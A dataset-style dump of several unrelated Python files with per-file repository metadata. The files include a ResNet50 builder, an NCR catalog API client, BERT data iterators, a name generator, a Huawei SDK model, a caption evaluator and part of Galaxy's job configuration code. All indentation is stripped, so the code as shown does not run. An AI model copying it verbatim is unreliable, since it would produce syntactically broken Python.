ni = Input([None, 224, 224, 3], name="input")
n = Conv2d(64, (7, 7), strides=(2, 2), padding='SAME', W_init=tf.initializers.he_normal(), name='conv1')(ni)
n = BatchNorm(name='bn_conv1', act='relu')(n)
n = MaxPool2d((3, 3), strides=(2, 2), name='max_pool1')(n)
for i, block_name in enumerate(block_names):
if len(block_name) == 2:
stage = int(block_name[0])
block = block_name[1]
if block == 'a':
strides = (1, 1) if stage == 2 else (2, 2)
n = conv_block(n, 3, block_filters[stage - 2], stage=stage, block=block, strides=strides)
else:
n = identity_block(n, 3, block_filters[stage - 2], stage=stage, block=block)
elif block_name == 'avg_pool':
n = GlobalMeanPool2d(name='avg_pool')(n)
elif block_name == 'fc1000':
n = Dense(n_classes, name='fc1000')(n)
if block_name == end_with:
break
network = Model(inputs=ni, outputs=n, name=name)
if pretrained:
restore_params(network)
return network
def restore_params(network, path='models'):
logging.info("Restore pre-trained parameters")
maybe_download_and_extract(
'resnet50_weights_tf_dim_ordering_tf_kernels.h5',
path,
'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/',
) # ls -al
try:
import h5py
except Exception:
raise ImportError('h5py not imported')
f = h5py.File(os.path.join(path, 'resnet50_weights_tf_dim_ordering_tf_kernels.h5'), 'r')
for layer in network.all_layers:
if len(layer.all_weights) == 0:
continue
w_names = list(f[layer.name])
params = [f[layer.name][n][:] for n in w_names]
# if 'bn' in layer.name:
# params = [x.reshape(1, 1, 1, -1) for x in params]
assign_weights(params, layer)
del params
f.close()
| 33.681373
| 120
| 0.623199
|
9e6f860b3cbecd3883c60f3f67aa318c3f97c252
| 7,201
|
py
|
Python
|
code/catalogMaker.py
|
NCR-Corporation/sample-app-burgers
|
478b18078b3e7eb217ba7baba318a30f12ae76ca
|
[
"Apache-2.0"
] | 7
|
2020-10-29T13:19:50.000Z
|
2022-01-12T21:36:24.000Z
|
code/catalogMaker.py
|
NCR-Corporation/sample-app-burgers
|
478b18078b3e7eb217ba7baba318a30f12ae76ca
|
[
"Apache-2.0"
] | 10
|
2020-10-30T14:23:33.000Z
|
2021-08-18T19:30:12.000Z
|
code/catalogMaker.py
|
NCR-Corporation/sample-app-burgers
|
478b18078b3e7eb217ba7baba318a30f12ae76ca
|
[
"Apache-2.0"
] | 5
|
2020-10-30T14:24:37.000Z
|
2021-06-21T14:02:49.000Z
|
from django.conf import settings
import requests
import re
from BurgersUnlimited import settings
from HMACAuth import HMACAuth
HIGHLANDS = settings.LOCATIONS['Burgers Unlimited Highlands']
SOUTHLAND = settings.LOCATIONS['Burgers Unlimited Southland']
MIDTOWN = settings.LOCATIONS ['Burgers Unlimited Midtown']
'''
Description: This function creates new items in the site catalog associated with the enterpriseId passed to this function. BEWARE: There is no delete to delete an item, you must make it as INACTIVE
Parameters:
-itemName [ The name of the item that you want to create. NOTICE: Spaces are not allowed]
-version [ Which version of the itemName is this. NOTICE: When updating, you must increase this number]
-shortDescription [ A description of the itemName]
-location [ Which site(location) is this item being added to]
-department [ Which department within the site is this location going to]
-enterpriseId [ The alphanumeric id associated with the location. NOTICE: This was created when the site was created. If unknown use query() within siteMaker]
Returns: N/A
'''
def createItem(itemName, version, shortDescription ,location, department):
url = 'https://gateway-staging.ncrcloud.com/catalog/items/%s' %(itemName)
payload = "{\"version\":%s,\"shortDescription\":{\"values\":[{\"locale\":\"en-US\",\"value\":\"%s\"}]},\"status\":\"INACTIVE\",\"merchandiseCategory\":\"%s\",\"departmentId\":\"%s\"}" %(
version, shortDescription, location, department)
r = requests.put(url, payload, auth=(HMACAuth()))
return r.json()
'''
Description: This function returns the item details of the itemName passed
Parameters: itemName [name of the item you want information about]
Returns: returns the json of the item in question. If no results, returns nothing
'''
def getItem(itemName):
url = url = 'https://gateway-staging.ncrcloud.com/catalog/items/%s' %itemName
r = requests.get(url,auth=(HMACAuth()))
return r.json()
'''
Description: This function will call the catalog bulk getItem function. It will grab all the items associated with a particular site/resturant
Parameters: storeName [The name of the store you wish to call all the items from]
Returns: An array with the names of all the items within the storeName.
'''
def getStoreItems(storeName):
url = 'https://gateway-staging.ncrcloud.com/catalog/items?merchandiseCategoryId=%s&itemStatus=ACTIVE' % storeName
r = requests.get(url, auth=(HMACAuth()))
tempItems = r.json()
storeItems = []
for item in tempItems['pageContent']:
for nestedItem in item['itemId'].values():
name = nestedItem
department = item['departmentId']
result = {}
result.update({'name': name, 'department': department})
storeItems.append(result)
return storeItems
'''
Description: This function creates a priceItem within the catalog API. The priceItem and item are tied together by the itemCode. I am using itemName as a replacement for itemCode
Parameters:
-itemName [The name that you entered for the item, when you made it (str)]
-itemPriceId [ A unique id for the item. (str)]
-version [ Which version of the itemName is this. NOTICE: When updating, you must increase this number]
-price [How much the item will cost]
-enterpriseId [ The alphanumeric id associated with the location. NOTICE: This was created when the site was created. If unknown use query() within siteMaker]
Returns: N/A
'''
def createPrice(itemName, itemPriceId, version, price, enterpriseId):
url = 'https://gateway-staging.ncrcloud.com/catalog/item-prices/%s/%s' % (itemName, itemPriceId)
payload = "{\"version\":%s,\"price\":%s,\"currency\":\"US Dollar\",\"effectiveDate\":\"2020-07-16T18:22:05.784Z\",\"status\":\"INACTIVE\"}" %(version, price)
r = requests.put(url,payload,auth=(HMACAuth(enterpriseId)))
print(r.json)
'''
Description: This function will find the priceItem from the associated itemName
Parameters:
-itemName [The name that you entered for the item, when you made it]
-itemPriceId [The itemPriceId you entered when you created the item]
-enterpriseId [ The alphanumeric id associated with the location. NOTICE: This was created when the site was created. If unknown use query() within siteMaker]
Returns: A json of the priceItem from the requested itemName
'''
def getPrice(itemName,itemPriceId,enterpriseId):
url = 'https://gateway-staging.ncrcloud.com/catalog/item-prices/%s/%s' %(itemName, itemPriceId)
r = requests.get(url, auth=(HMACAuth(enterpriseId)))
print(r.json())
return r.json()
'''
Description: This function will get all the priceItems from the given itemNames
Parameters:
itemIds [A list of itemNames]
-enterpriseId [ The alphanumeric id associated with the location. NOTICE: This was created when the site was created. If unknown use query() within siteMaker]
Returns: A list of priceItems for the given itemNames
'''
def getAllPrices(itemIds,enterpriseId):
url = 'https://gateway-staging.ncrcloud.com/catalog/item-prices/get-multiple'
itemNames = []
for i in range(len(itemIds)):
itemNames.append(itemIds[i]['name'])
modifiedItems = createJsonString(itemNames)
payload = "{\"itemIds\":[%s]}" %modifiedItems
r = requests.post(url,payload, auth=(HMACAuth(enterpriseId)))
tempPrices = r.json()
itemsWithPrices = []
i = 0
for item in tempPrices['itemPrices']:
result = {}
price = item.get('price')
nested = item.get('priceId')
name = nested.get('itemCode')
department = -99
for collection in itemIds:
if collection['name'] == name:
department = collection['department']
price = addChange(price)
name = addSpacesInbetweenCaptialLetters(name)
if isUnique(itemsWithPrices,name):
result.update({'name': name, 'price': price, 'department': department })
itemsWithPrices.append(result)
i += 1
else:
result.update({'name': name, 'price': price})
return itemsWithPrices
'''
Description: A helper function to help the front end display the item Names correctly. The API does not currently support spaces in the itemName
Parameters: A string
Returns: The string sepearted on the capitals
'''
def addSpacesInbetweenCaptialLetters(str1):
return re.sub(r"(\w)([A-Z])", r"\1 \2", str1)
'''
Description: A helper function to build json strings for the getPriceItems payload.
Parameters: items [A list of itemNames to be turned into a json string]
Returns: a string in the correct format for the getPriceItems payload.
'''
def createJsonString(items):
String = ""
for item in items:
String = String + "{\"itemCode\":\"%s\"}," %item
String =String.rstrip(',')
return String
def isUnique(dict_list,item):
for d in dict_list:
if d['name'] == item:
return False
return True
#TODO: Fix this bug when you pass .01 - 0.9
def addChange(string):
string = str(string)
if "." not in string:
string = string + '.00'
elif ".0" in string:
string = string + '0'
return string
| 35.648515
| 197
| 0.699625
|
aed5e2bce0b94c3d5410f73496d834f3ee5433a3
| 4,326
|
py
|
Python
|
eval/DataIter.py
|
DunZhang/LUSE
|
5b13cc5882052dfbf0e756c5b403958b67168223
|
[
"MIT"
] | 10
|
2021-07-31T02:50:37.000Z
|
2022-03-29T06:44:50.000Z
|
eval/DataIter.py
|
DunZhang/LUSE
|
5b13cc5882052dfbf0e756c5b403958b67168223
|
[
"MIT"
] | 1
|
2021-08-01T14:36:09.000Z
|
2021-08-02T02:10:37.000Z
|
eval/DataIter.py
|
DunZhang/LUSE
|
5b13cc5882052dfbf0e756c5b403958b67168223
|
[
"MIT"
] | 1
|
2022-01-26T03:05:02.000Z
|
2022-01-26T03:05:02.000Z
|
import random
import torch
from transformers import BertTokenizer
from collections import Iterable
import logging
logger = logging.getLogger("OPPOSTS")
class DataIter(Iterable):
def __init__(self):
self.swap_pair = None
def reset(self):
pass
class VecDataIter(DataIter):
""" """
def __init__(self, data_path: str, tokenizer: BertTokenizer, batch_size: int = 64, max_len: int = 128):
"""
labe2id不为空代表使用完形填空模型
"""
super().__init__()
self.tokenizer = tokenizer
self.batch_size = batch_size
self.max_len = max_len
self.data_path = data_path
self.data = []
def reset(self):
logger.info("dataiter reset, 读取数据")
self.data.clear()
with open(self.data_path, "r", encoding="utf8") as fr:
for line in fr:
ss = line.strip().split("\t")
if len(ss) == 3:
self.data.append([ss[0].strip(), ss[1].strip(), int(ss[2])])
logger.info("共读取数据:{}条".format(len(self.data)))
random.shuffle(self.data)
self.data_iter = iter(self.data)
def get_steps(self):
return len(self.data) // self.batch_size
def get_batch_data(self):
batch_data = []
for i in self.data_iter:
batch_data.append(i)
if len(batch_data) == self.batch_size:
break
# 判断
if len(batch_data) == self.batch_size:
batch_sens_a = [i[0] for i in batch_data]
batch_sens_b = [i[1] for i in batch_data]
batch_labels = [[i[2]] for i in batch_data]
ipt_a = self.tokenizer.batch_encode_plus(batch_text_or_text_pairs=batch_sens_a, padding="longest",
return_tensors="pt", max_length=self.max_len, truncation=True)
ipt_b = self.tokenizer.batch_encode_plus(batch_text_or_text_pairs=batch_sens_b, padding="longest",
return_tensors="pt", max_length=self.max_len, truncation=True)
ipt = {
"labels": torch.tensor(batch_labels),
"ipt_a": ipt_a,
"ipt_b": ipt_b
}
return ipt
return None
def __iter__(self):
return self
def __next__(self):
ipts = self.get_batch_data()
if ipts is None:
raise StopIteration
else:
return ipts
class CLFDataIter(DataIter):
""" """
def __init__(self, data_path: str, tokenizer: BertTokenizer, batch_size: int = 64, max_len: int = 128):
"""
labe2id不为空代表使用完形填空模型
"""
super().__init__()
self.tokenizer = tokenizer
self.batch_size = batch_size
self.max_len = max_len
self.data_path = data_path
self.data = []
def reset(self):
logger.info("dataiter reset, 读取数据")
self.data.clear()
with open(self.data_path, "r", encoding="utf8") as fr:
for line in fr:
ss = line.strip().split("\t")
if len(ss) == 2:
self.data.append([ss[0].strip(), int(ss[1])])
logger.info("共读取数据:{}条".format(len(self.data)))
random.shuffle(self.data)
self.data_iter = iter(self.data)
def get_steps(self):
return len(self.data) // self.batch_size
def get_batch_data(self):
batch_data = []
for i in self.data_iter:
batch_data.append(i)
if len(batch_data) == self.batch_size:
break
# 判断
if len(batch_data) == self.batch_size:
batch_sens = [i[0] for i in batch_data]
batch_labels = [i[1] for i in batch_data]
ipt = self.tokenizer.batch_encode_plus(batch_text_or_text_pairs=batch_sens, padding="longest",
return_tensors="pt", max_length=self.max_len, truncation=True)
ipt["labels"] = torch.tensor(batch_labels)
return ipt
return None
def __iter__(self):
return self
def __next__(self):
ipts = self.get_batch_data()
if ipts is None:
raise StopIteration
else:
return ipts
if __name__ == "__main__":
pass
| 31.122302
| 115
| 0.553398
|
dccd0bb58a82146f72f4c4a8f14d433bdba9d334
| 951
|
py
|
Python
|
archive/resources/name_generator.py
|
iphilpot/DoE_Bloom_Filter
|
bb3c60a9679c853510233480e8876364c147838b
|
[
"MIT"
] | 1
|
2019-06-06T23:17:18.000Z
|
2019-06-06T23:17:18.000Z
|
archive/resources/name_generator.py
|
iphilpot/DoE_Bloom_Filter
|
bb3c60a9679c853510233480e8876364c147838b
|
[
"MIT"
] | null | null | null |
archive/resources/name_generator.py
|
iphilpot/DoE_Bloom_Filter
|
bb3c60a9679c853510233480e8876364c147838b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
family_file='familynames-usa-top1000.txt'
female_file='femalenames-usa-top1000.txt'
male_file='malenames-usa-top1000.txt'
username_file='usernames.txt'
# (female * family) + (male * family) = 2,000,000
# wc -l username.txt = 2,000,000
user_file=open(username_file, 'w')
with open(family_file) as fam_fp:
fam_line = fam_fp.readline()
while fam_line:
with open(female_file) as f_fp:
f_line = f_fp.readline()
while f_line:
f_user = f_line.strip().lower() + '.' + fam_line.lower()
user_file.write(f_user)
f_line = f_fp.readline()
with open(male_file) as m_fp:
m_line = m_fp.readline()
while m_line:
m_user = m_line.strip().lower() + '.' + fam_line.lower()
user_file.write(m_user)
m_line = m_fp.readline()
fam_line = fam_fp.readline()
user_file.close()
| 30.677419
| 72
| 0.597266
|
9eeee8ced86fa85d4f7afc7e6f6809786bb3d4b7
| 3,457
|
py
|
Python
|
huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/issue_item_sf_v4_tracker.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/issue_item_sf_v4_tracker.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/issue_item_sf_v4_tracker.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class IssueItemSfV4Tracker:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'id': 'int',
'name': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name'
}
def __init__(self, id=None, name=None):
"""IssueItemSfV4Tracker - a model defined in huaweicloud sdk"""
self._id = None
self._name = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
@property
def id(self):
"""Gets the id of this IssueItemSfV4Tracker.
类型id
:return: The id of this IssueItemSfV4Tracker.
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this IssueItemSfV4Tracker.
类型id
:param id: The id of this IssueItemSfV4Tracker.
:type: int
"""
self._id = id
@property
def name(self):
"""Gets the name of this IssueItemSfV4Tracker.
类型名称
:return: The name of this IssueItemSfV4Tracker.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this IssueItemSfV4Tracker.
类型名称
:param name: The name of this IssueItemSfV4Tracker.
:type: str
"""
self._name = name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, IssueItemSfV4Tracker):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 24.34507
| 79
| 0.526179
|
8d90e562575aebd21875ea59c5394b04fc1610af
| 2,604
|
py
|
Python
|
egs/clotho/asr1/local/evaluate_decoded_captions.py
|
chintu619/espne
|
785d7f64035459e316f79f2ee280d729bc76bb1e
|
[
"Apache-2.0"
] | null | null | null |
egs/clotho/asr1/local/evaluate_decoded_captions.py
|
chintu619/espne
|
785d7f64035459e316f79f2ee280d729bc76bb1e
|
[
"Apache-2.0"
] | 2
|
2021-05-27T02:23:12.000Z
|
2021-06-05T15:18:23.000Z
|
egs/clotho/asr1/local/evaluate_decoded_captions.py
|
chintu619/espnet
|
785d7f64035459e316f79f2ee280d729bc76bb1e
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import json
import os
from eval_metrics import evaluate_metrics
def main():
parser = argparse.ArgumentParser()
parser.add_argument("decoded_json_path", type=str)
parser.add_argument("groundtruth_captions_path", type=str)
args = parser.parse_args()
gts = {}
with open(args.groundtruth_captions_path) as f:
lines = [line[:-1] for line in f.readlines()]
for line in lines:
key = line.split(' ')[0]
caption = ' '.join(line.split(' ')[1:])
fileid = key.split('_')[0]
capid = int(key[-1])
if fileid not in gts:
gts[fileid] = {'file_name': fileid}
gts[fileid][f'caption_{capid+1}'] = caption.lower()
preds = {}
with open(args.decoded_json_path) as f:
json_data = json.load(f)
for key, val in json_data['utts'].items():
fileid = key.split('_')[0]
if fileid not in preds:
preds[fileid] = {'file_name': fileid, 'caption_predicted': ''}
pred_caption = val['output'][0]['rec_text'].replace(' <eos>','').replace('<eos>','').lower().replace('▁',' ')
preds[fileid][f'caption_predicted'] = pred_caption
captions_gts = [val for _,val in gts.items()]
captions_preds = [val for _,val in preds.items()]
metrics = evaluate_metrics(captions_preds, captions_gts)
metrics_individual = {}
for metric in metrics:
for fileid,val in metrics[metric]['scores'].items():
if fileid not in metrics_individual: metrics_individual[fileid] = []
metrics_individual[fileid].append(round(val,3))
dashes = '|'.join(['{:-^10}'.format('')]*10)
headers = ['fileID','BLEU_1','BLEU_2','BLEU_3','BLEU_4','METEOR','ROUGE_L','CIDEr','SPICE','SPIDEr']
def tabled_row(arr): return '|'.join(['{:^10}'.format(x) for x in arr])
decode_dirpath = os.path.dirname(args.decoded_json_path)
caption_evalpath = os.path.join(decode_dirpath,'caption_evaluation_results.txt')
with open(caption_evalpath, 'w') as f:
f.write(f'|{dashes}|\n')
f.write(f'|{tabled_row(headers)}|\n')
f.write(f'|{dashes}|\n')
metrics_summary = ['overall']+[round(metrics[metric]['score'],3) for metric in metrics]
f.write(f'|{tabled_row(metrics_summary)}|\n')
f.write(f'|{dashes}|\n')
for fileid,score_list in metrics_individual.items():
metrics_fileid = [fileid]+score_list
f.write(f'|{tabled_row(metrics_fileid)}|\n')
f.write(f'|{dashes}|\n')
if __name__ == "__main__":
main()
| 41.333333
| 121
| 0.603303
|
df96bf209d7090e1df9f2553431df61e26521819
| 89,369
|
py
|
Python
|
lib/galaxy/jobs/__init__.py
|
mmyschyshyn/Vocalaxy
|
9f501b49eaa96b90a39a05c74170b5cb78d88759
|
[
"CC-BY-3.0"
] | null | null | null |
lib/galaxy/jobs/__init__.py
|
mmyschyshyn/Vocalaxy
|
9f501b49eaa96b90a39a05c74170b5cb78d88759
|
[
"CC-BY-3.0"
] | null | null | null |
lib/galaxy/jobs/__init__.py
|
mmyschyshyn/Vocalaxy
|
9f501b49eaa96b90a39a05c74170b5cb78d88759
|
[
"CC-BY-3.0"
] | null | null | null |
"""
Support for running a tool in Galaxy via an internal job management system
"""
from abc import ABCMeta
from abc import abstractmethod
import time
import copy
import datetime
import galaxy
import logging
import os
import pwd
import random
import re
import shutil
import subprocess
import sys
import traceback
from galaxy import model, util
from galaxy.datatypes import metadata
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.jobs.actions.post import ActionBox
from galaxy.jobs.mapper import JobRunnerMapper
from galaxy.jobs.runners import BaseJobRunner, JobState
from galaxy.util.bunch import Bunch
from galaxy.util.expressions import ExpressionContext
from galaxy.util.json import loads
from galaxy.util import unicodify
from .output_checker import check_output
from .datasets import TaskPathRewriter
from .datasets import OutputsToWorkingDirectoryPathRewriter
from .datasets import NullDatasetPathRewriter
from .datasets import DatasetPath
log = logging.getLogger( __name__ )
DATABASE_MAX_STRING_SIZE = util.DATABASE_MAX_STRING_SIZE
DATABASE_MAX_STRING_SIZE_PRETTY = util.DATABASE_MAX_STRING_SIZE_PRETTY
# This file, if created in the job's working directory, will be used for
# setting advanced metadata properties on the job and its associated outputs.
# This interface is currently experimental, is only used by the upload tool,
# and should eventually become API'd
TOOL_PROVIDED_JOB_METADATA_FILE = 'galaxy.json'
class JobDestination( Bunch ):
"""
Provides details about where a job runs
"""
def __init__(self, **kwds):
self['id'] = None
self['url'] = None
self['tags'] = None
self['runner'] = None
self['legacy'] = False
self['converted'] = False
self['env'] = []
self['resubmit'] = []
# dict is appropriate (rather than a bunch) since keys may not be valid as attributes
self['params'] = dict()
# Use the values persisted in an existing job
if 'from_job' in kwds and kwds['from_job'].destination_id is not None:
self['id'] = kwds['from_job'].destination_id
self['params'] = kwds['from_job'].destination_params
super(JobDestination, self).__init__(**kwds)
# Store tags as a list
if self.tags is not None:
self['tags'] = [ x.strip() for x in self.tags.split(',') ]
class JobToolConfiguration( Bunch ):
"""
Provides details on what handler and destination a tool should use
A JobToolConfiguration will have the required attribute 'id' and optional
attributes 'handler', 'destination', and 'params'
"""
def __init__(self, **kwds):
self['handler'] = None
self['destination'] = None
self['params'] = dict()
super(JobToolConfiguration, self).__init__(**kwds)
def get_resource_group( self ):
return self.get( "resources", None )
def config_exception(e, file):
abs_path = os.path.abspath(file)
message = 'Problem parsing the XML in file %s, ' % abs_path
message += 'please correct the indicated portion of the file and restart Galaxy.'
message += str(e)
log.exception(message)
return Exception(message)
class JobConfiguration( object ):
"""A parser and interface to advanced job management features.
These features are configured in the job configuration, by default, ``job_conf.xml``
"""
DEFAULT_NWORKERS = 4
def __init__(self, app):
"""Parse the job configuration XML.
"""
self.app = app
self.runner_plugins = []
self.dynamic_params = None
self.handlers = {}
self.handler_runner_plugins = {}
self.default_handler_id = None
self.destinations = {}
self.destination_tags = {}
self.default_destination_id = None
self.tools = {}
self.resource_groups = {}
self.default_resource_group = None
self.resource_parameters = {}
self.limits = Bunch()
self.__parse_resource_parameters()
# Initialize the config
job_config_file = self.app.config.job_config_file
try:
tree = util.parse_xml(job_config_file)
self.__parse_job_conf_xml(tree)
except IOError:
log.warning( 'Job configuration "%s" does not exist, using legacy job configuration from Galaxy config file "%s" instead' % ( self.app.config.job_config_file, self.app.config.config_file ) )
self.__parse_job_conf_legacy()
except Exception as e:
raise config_exception(e, job_config_file)
def __parse_job_conf_xml(self, tree):
"""Loads the new-style job configuration from options in the job config file (by default, job_conf.xml).
:param tree: Object representing the root ``<job_conf>`` object in the job config file.
:type tree: ``xml.etree.ElementTree.Element``
"""
root = tree.getroot()
log.debug('Loading job configuration from %s' % self.app.config.job_config_file)
# Parse job plugins
plugins = root.find('plugins')
if plugins is not None:
for plugin in self.__findall_with_required(plugins, 'plugin', ('id', 'type', 'load')):
if plugin.get('type') == 'runner':
workers = plugin.get('workers', plugins.get('workers', JobConfiguration.DEFAULT_NWORKERS))
runner_kwds = self.__get_params(plugin)
runner_info = dict(id=plugin.get('id'),
load=plugin.get('load'),
workers=int(workers),
kwds=runner_kwds)
self.runner_plugins.append(runner_info)
else:
log.error('Unknown plugin type: %s' % plugin.get('type'))
for plugin in self.__findall_with_required(plugins, 'plugin', ('id', 'type')):
if plugin.get('id') == 'dynamic' and plugin.get('type') == 'runner':
self.dynamic_params = self.__get_params(plugin)
# Load tasks if configured
if self.app.config.use_tasked_jobs:
self.runner_plugins.append(dict(id='tasks', load='tasks', workers=self.app.config.local_task_queue_workers))
# Parse handlers
handlers = root.find('handlers')
if handlers is not None:
for handler in self.__findall_with_required(handlers, 'handler'):
id = handler.get('id')
if id in self.handlers:
log.error("Handler '%s' overlaps handler with the same name, ignoring" % id)
else:
log.debug("Read definition for handler '%s'" % id)
self.handlers[id] = (id,)
for plugin in handler.findall('plugin'):
if id not in self.handler_runner_plugins:
self.handler_runner_plugins[id] = []
self.handler_runner_plugins[id].append( plugin.get('id') )
if handler.get('tags', None) is not None:
for tag in [ x.strip() for x in handler.get('tags').split(',') ]:
if tag in self.handlers:
self.handlers[tag].append(id)
else:
self.handlers[tag] = [id]
# Determine the default handler(s)
self.default_handler_id = self.__get_default(handlers, self.handlers.keys())
# Parse destinations
destinations = root.find('destinations')
job_metrics = self.app.job_metrics
for destination in self.__findall_with_required(destinations, 'destination', ('id', 'runner')):
id = destination.get('id')
destination_metrics = destination.get( "metrics", None )
if destination_metrics:
if not util.asbool( destination_metrics ):
# disable
job_metrics.set_destination_instrumenter( id, None )
else:
metrics_conf_path = self.app.config.resolve_path( destination_metrics )
job_metrics.set_destination_conf_file( id, metrics_conf_path )
else:
metrics_elements = self.__findall_with_required( destination, 'job_metrics', () )
if metrics_elements:
job_metrics.set_destination_conf_element( id, metrics_elements[ 0 ] )
job_destination = JobDestination(**dict(destination.items()))
job_destination['params'] = self.__get_params(destination)
job_destination['env'] = self.__get_envs(destination)
job_destination['resubmit'] = self.__get_resubmits(destination)
self.destinations[id] = (job_destination,)
if job_destination.tags is not None:
for tag in job_destination.tags:
if tag not in self.destinations:
self.destinations[tag] = []
self.destinations[tag].append(job_destination)
# Determine the default destination
self.default_destination_id = self.__get_default(destinations, self.destinations.keys())
# Parse resources...
resources = root.find('resources')
if resources is not None:
self.default_resource_group = resources.get( "default", None )
for group in self.__findall_with_required(resources, 'group'):
id = group.get('id')
fields_str = group.get('fields', None) or group.text or ''
fields = [ f for f in fields_str.split(",") if f ]
self.resource_groups[ id ] = fields
# Parse tool mappings
tools = root.find('tools')
if tools is not None:
for tool in self.__findall_with_required(tools, 'tool'):
# There can be multiple definitions with identical ids, but different params
id = tool.get('id').lower().rstrip('/')
if id not in self.tools:
self.tools[id] = list()
self.tools[id].append(JobToolConfiguration(**dict(tool.items())))
self.tools[id][-1]['params'] = self.__get_params(tool)
types = dict(registered_user_concurrent_jobs=int,
anonymous_user_concurrent_jobs=int,
walltime=str,
output_size=util.size_to_bytes)
self.limits = Bunch(registered_user_concurrent_jobs=None,
anonymous_user_concurrent_jobs=None,
walltime=None,
walltime_delta=None,
output_size=None,
destination_user_concurrent_jobs={},
destination_total_concurrent_jobs={})
# Parse job limits
limits = root.find('limits')
if limits is not None:
for limit in self.__findall_with_required(limits, 'limit', ('type',)):
type = limit.get('type')
# concurrent_jobs renamed to destination_user_concurrent_jobs in job_conf.xml
if type in ( 'destination_user_concurrent_jobs', 'concurrent_jobs', 'destination_total_concurrent_jobs' ):
id = limit.get('tag', None) or limit.get('id')
if type == 'destination_total_concurrent_jobs':
self.limits.destination_total_concurrent_jobs[id] = int(limit.text)
else:
self.limits.destination_user_concurrent_jobs[id] = int(limit.text)
elif limit.text:
self.limits.__dict__[type] = types.get(type, str)(limit.text)
if self.limits.walltime is not None:
h, m, s = [ int( v ) for v in self.limits.walltime.split( ':' ) ]
self.limits.walltime_delta = datetime.timedelta( 0, s, 0, 0, m, h )
log.debug('Done loading job configuration')
def __parse_job_conf_legacy(self):
"""Loads the old-style job configuration from options in the galaxy config file (by default, config/galaxy.ini).
"""
log.debug('Loading job configuration from %s' % self.app.config.config_file)
# Always load local and lwr
self.runner_plugins = [dict(id='local', load='local', workers=self.app.config.local_job_queue_workers), dict(id='lwr', load='lwr', workers=self.app.config.cluster_job_queue_workers)]
# Load tasks if configured
if self.app.config.use_tasked_jobs:
self.runner_plugins.append(dict(id='tasks', load='tasks', workers=self.app.config.local_task_queue_workers))
for runner in self.app.config.start_job_runners:
self.runner_plugins.append(dict(id=runner, load=runner, workers=self.app.config.cluster_job_queue_workers))
# Set the handlers
for id in self.app.config.job_handlers:
self.handlers[id] = (id,)
self.handlers['default_job_handlers'] = self.app.config.default_job_handlers
self.default_handler_id = 'default_job_handlers'
# Set tool handler configs
for id, tool_handlers in self.app.config.tool_handlers.items():
self.tools[id] = list()
for handler_config in tool_handlers:
# rename the 'name' key to 'handler'
handler_config['handler'] = handler_config.pop('name')
self.tools[id].append(JobToolConfiguration(**handler_config))
# Set tool runner configs
for id, tool_runners in self.app.config.tool_runners.items():
# Might have been created in the handler parsing above
if id not in self.tools:
self.tools[id] = list()
for runner_config in tool_runners:
url = runner_config['url']
if url not in self.destinations:
# Create a new "legacy" JobDestination - it will have its URL converted to a destination params once the appropriate plugin has loaded
self.destinations[url] = (JobDestination(id=url, runner=url.split(':', 1)[0], url=url, legacy=True, converted=False),)
for tool_conf in self.tools[id]:
if tool_conf.params == runner_config.get('params', {}):
tool_conf['destination'] = url
break
else:
# There was not an existing config (from the handlers section) with the same params
# rename the 'url' key to 'destination'
runner_config['destination'] = runner_config.pop('url')
self.tools[id].append(JobToolConfiguration(**runner_config))
self.destinations[self.app.config.default_cluster_job_runner] = (JobDestination(id=self.app.config.default_cluster_job_runner, runner=self.app.config.default_cluster_job_runner.split(':', 1)[0], url=self.app.config.default_cluster_job_runner, legacy=True, converted=False),)
self.default_destination_id = self.app.config.default_cluster_job_runner
# Set the job limits
self.limits = Bunch(registered_user_concurrent_jobs=self.app.config.registered_user_job_limit,
anonymous_user_concurrent_jobs=self.app.config.anonymous_user_job_limit,
walltime=self.app.config.job_walltime,
walltime_delta=self.app.config.job_walltime_delta,
output_size=self.app.config.output_size_limit,
destination_user_concurrent_jobs={},
destination_total_concurrent_jobs={})
log.debug('Done loading job configuration')
def get_tool_resource_parameters( self, tool_id ):
""" Given a tool id, return XML elements describing parameters to
insert into job resources.
:tool id: A tool ID (a string)
:returns: List of parameter elements.
"""
fields = []
if not tool_id:
